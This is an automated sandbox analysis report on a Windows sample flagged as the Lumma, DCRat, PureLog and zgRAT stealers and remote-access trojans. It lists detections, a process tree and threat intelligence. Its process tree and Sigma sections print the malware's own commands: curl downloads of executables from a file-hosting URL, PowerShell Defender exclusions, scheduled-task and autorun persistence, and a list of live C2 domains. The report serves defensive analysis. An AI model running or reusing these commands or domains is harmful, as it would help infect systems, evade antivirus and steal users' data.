Edit tour

Windows Analysis Report
gh3zRWl4or.exe

Overview

General Information

Sample name:	gh3zRWl4or.exe renamed because original name is a hash value
Original sample name:	77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2.exe
Analysis ID:	1522823
MD5:	b172feb05a0515d00442f6ef11b167bf
SHA1:	7b68a6d3278644d6ffe8016b582141b67826eb96
SHA256:	77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2
Tags:	exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Electron Application Child Processes

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

gh3zRWl4or.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\gh3zRWl4or.exe" MD5: B172FEB05A0515D00442F6EF11B167BF)

conhost.exe (PID: 3588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 6500 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

kdmapper.exe (PID: 5292 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)

wscript.exe (PID: 1836 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 3232 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 6632 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

csc.exe (PID: 3256 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 1928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 2332 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 2500 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

Conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4064 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7116 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 5100 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6436 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 1352 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

msedge.exe (PID: 1504 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 6972 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 5392 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

physmeme.exe (PID: 1196 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)

conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

schtasks.exe (PID: 1512 cmdline: schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

LBUPSPkYsNXrxZEtdVzCng.exe (PID: 6780 cmdline: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

LBUPSPkYsNXrxZEtdVzCng.exe (PID: 2120 cmdline: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 3700 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4196 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

LBUPSPkYsNXrxZEtdVzCng.exe (PID: 6492 cmdline: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 7120 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 516 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

LBUPSPkYsNXrxZEtdVzCng.exe (PID: 1536 cmdline: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 2840 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

LBUPSPkYsNXrxZEtdVzCng.exe (PID: 2864 cmdline: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 6088 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 2256 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5756 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4184 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["tearrybyiwo.shop", "fossillargeiw.shop", "surveriysiop.shop", "captainynfanw.shop", "tiddymarktwo.shop", "strappystyio.shop", "appleboltelwk.shop", "coursedonnyre.shop", "tendencerangej.shop"], "Build id": "1AsNN2--5899070203"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Edge\msedge.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Edge\msedge.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: msedge.exe PID: 6632	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: msedge.exe PID: 1504	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
16.0.msedge.exe.b90000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
16.0.msedge.exe.b90000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.3.kdmapper.exe.52926cf.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.3.kdmapper.exe.52926cf.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.3.kdmapper.exe.6a576cf.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.3.kdmapper.exe.6a576cf.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.3.kdmapper.exe.52926cf.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.3.kdmapper.exe.52926cf.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.3.kdmapper.exe.6a576cf.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.3.kdmapper.exe.6a576cf.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 2332, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', ProcessId: 4064, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 6632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LBUPSPkYsNXrxZEtdVzCng

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 6632, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", ProcessId: 3256, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Electron Application Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', ProcessId: 4064, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\gh3zRWl4or.exe", ParentImage: C:\Users\user\Desktop\gh3zRWl4or.exe, ParentProcessId: 1476, ParentProcessName: gh3zRWl4or.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 2520, ProcessName: cmd.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 3256, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP", ProcessId: 1928, ProcessName: cvtres.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 5292, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 1836, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 6632, TargetFilename: C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', ProcessId: 4064, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", ProcessId: 3256, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
